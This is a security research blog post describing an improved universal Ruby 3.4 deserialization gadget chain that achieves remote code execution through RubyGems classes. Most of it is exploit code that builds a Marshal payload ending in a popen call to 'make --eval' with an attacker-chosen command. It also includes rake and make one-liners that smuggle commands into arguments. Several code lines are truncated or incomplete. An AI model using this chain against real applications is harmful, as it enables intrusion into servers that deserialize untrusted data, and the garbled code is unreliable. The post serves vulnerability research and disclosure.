Ruby 3.4 Universal RCE Deserialization Gadget Chain
Luke Jahnke24 November 2024

In a blog post from 2018 I shared the first universal gadget chain to exploit Ruby deserialzation. There have been many new versions of Ruby since then, sometimes including code changes that break published gadget chains. So far, the breaks have only ever been temporary, with the infosec community releasing new gadget chains as needed.

While the most recent gadget chain works against Ruby 3.4-rc, there are three improvements I wanted to investigate:

  1. The vulnerable application performing deserialization must have already loaded the net/http library to be able to use the URI module.
  2. For the remote command execution (RCE) gadget chain, the zip binary must be available on the system, which is not the case for official ruby Docker images.
  3. An exception is raised at the end of processing the gadget chain.

# Improvement 1

While I did not find a gadget to load the standard URI module, I found that RubyGems includes a vendored copy of URI under Gem::URI that is suitable. Although also not available by default, it can become loaded through deserialization as Gem::SpecFetcher is registered for autoloading, which loads Gem::RemoteFetcher which loads Gem::Request which loads Gem::Net which finally loads Gem::URI.

# Improvement 2

Instead of ending the gadget chain with executing the zip binary with a malicious argument, rake or make are better candidates. They are installed by default in the official ruby Docker images and rake is in the top 10 most downloaded Ruby dependencies. They both also meet the requirement of executing arbitrary commands with control over ARGV[2] but not ARGV[1] (thanks GTFOBins).

$ rake rev-parse '-p`/bin/id 1>&0`'
uid=1000(app) gid=1000(app) groups=1000(app)

$ make rev-parse $'--eval=rev-parse:\n\t-/bin/id'
uid=1000(app) gid=1000(app) groups=1000(app)

# Improvement 3

The next improvement was to avoid the exception being raised after executing the gadget chain. The exception comes from the start of the gadget chain being a Gem::Version object. While Gem::Version is useful as it calls the to_s method on an arbitrary object, unfortunately it also performs a strict regular expression match against the value returned by the to_s method.

class Gem::Version
  VERSION_PATTERN = '[0-9]+(?>\.[0-9a-zA-Z]+)*(-[0-9A-Za-z-]+(\.[0-9A-Za-z-]+)*)?' # :nodoc:

  def marshal_load(array)
    initialize array[0]

  def initialize(version)
    unless self.class.correct?(version)
      raise ArgumentError, "Malformed version number string #{version}"

  def self.correct?(version)
    nil_versions_are_discouraged! if version.nil?


There a few different approaches we could try to avoid the exception:

I confirmed the final approach is possible with an UncaughtThrowError object (defined in vm_eval.c).

#define id_mesg idMesg
static ID id_result, id_tag, id_value;

    rb_eUncaughtThrow = rb_define_class("UncaughtThrowError", rb_eArgError);
    rb_define_method(rb_eUncaughtThrow, "to_s", uncaught_throw_to_s, 0);
    id_tag = rb_intern_const("tag");

static VALUE
uncaught_throw_to_s(VALUE exc)
    VALUE mesg = rb_attr_get(exc, id_mesg);
    VALUE tag = uncaught_throw_tag(exc);
    return rb_str_format(1, &tag, mesg);

static VALUE
uncaught_throw_tag(VALUE exc)
    return rb_ivar_get(exc, id_tag);

This is perfect as we can use the %s conversion specifier to trigger a call to to_s. To suppress the value returned by to_s we change %s to %.0s, which truncates to a 0 length string. Then we include the text of what we want the return value to be, specifically a version string that matches the regular expression.

Now that we have avoided the exception, we no longer need two sepearate gadget chains and can combine them into a single payload.

# Gadget Chain

The following gadget chain contains my three improvements, but is based on the work of others, including Leonardo Giovanni, Peter Stöckli and William Bowling.

Gem::SpecFetcher # Autoload

def call_url_and_create_folder(url)
  # improvement 1
  uri = Gem::URI::HTTP.allocate
  uri.instance_variable_set("@path", "/")
  uri.instance_variable_set("@scheme", "s3")
  uri.instance_variable_set("@host", url + "?")
  # c5fe... is the SHA-1 of "any"
    "/../../../../../../../../../../../../../../../" + 
  uri.instance_variable_set("@user", "any")
  uri.instance_variable_set("@password", "any")

  source = Gem::Source.allocate
  source.instance_variable_set("@uri", uri)
  source.instance_variable_set("@update_cache", true)

  index_spec = Gem::Resolver::IndexSpecification.allocate
  index_spec.instance_variable_set("@name", "name")
  index_spec.instance_variable_set("@source", source)

  request_set = Gem::RequestSet.allocate
  request_set.instance_variable_set("@sorted_requests", [index_spec])

  lockfile ='','','')
  lockfile.instance_variable_set("@set", request_set)
  lockfile.instance_variable_set("@dependencies", [])

  return lockfile

def git_gadget(executable, second_param)
  git_source = Gem::Source::Git.allocate
  git_source.instance_variable_set("@git", executable)
  git_source.instance_variable_set("@reference", second_param)
  git_source.instance_variable_set("@root_dir", "/tmp")
  git_source.instance_variable_set("@repository", "any")
  git_source.instance_variable_set("@name", "any")

  spec = Gem::Resolver::Specification.allocate
  spec.instance_variable_set("@name", "any")

  git_spec = Gem::Resolver::GitSpecification.allocate
  git_spec.instance_variable_set("@source", git_source)
  git_spec.instance_variable_set("@spec", spec)

  spec_specification = Gem::Resolver::SpecSpecification.allocate
  spec_specification.instance_variable_set("@spec", git_spec)

  return spec_specification

def command_gadget(command_to_execute)
  # improvement 2
  git_gadget_execute_cmd = git_gadget("make", "--eval=rev-parse:\n\t-#{command_to_execute}")

  request_set = Gem::RequestSet.allocate
  request_set.instance_variable_set("@sorted_requests", [git_gadget_execute_cmd])

  lockfile ='','','')
  lockfile.instance_variable_set("@set", request_set)

  return lockfile

def to_s_wrapper(inner)
  # improvement 3 - note we cannot use allocate + instance_variable_set
  # as the instance variable name does not begin with @
  ute =, nil, "")

  version = Gem::Version.allocate
  version.instance_variable_set("@version", ute)

  return version

def create_rce_gadget_chain(command_to_execute)
  exec_gadget = command_gadget(command_to_execute)

  return Marshal.dump([Gem::SpecFetcher, to_s_wrapper(exec_gadget)])

url =  ""
call_url_gadget = call_url_and_create_folder(url)

exec_gadget = command_gadget("id > /tmp/marshal-poc")
rce_gadget_chain = Marshal.dump(

puts rce_gadget_chain.inspect

# Future Improvements

The biggest remaining improvement is to move away from using the popen sink from Gem::Source::Git in the gadget chain. Achieving this would hopefully mean the gadget chain no longer issues outbound network requests or modifies the filesystem.

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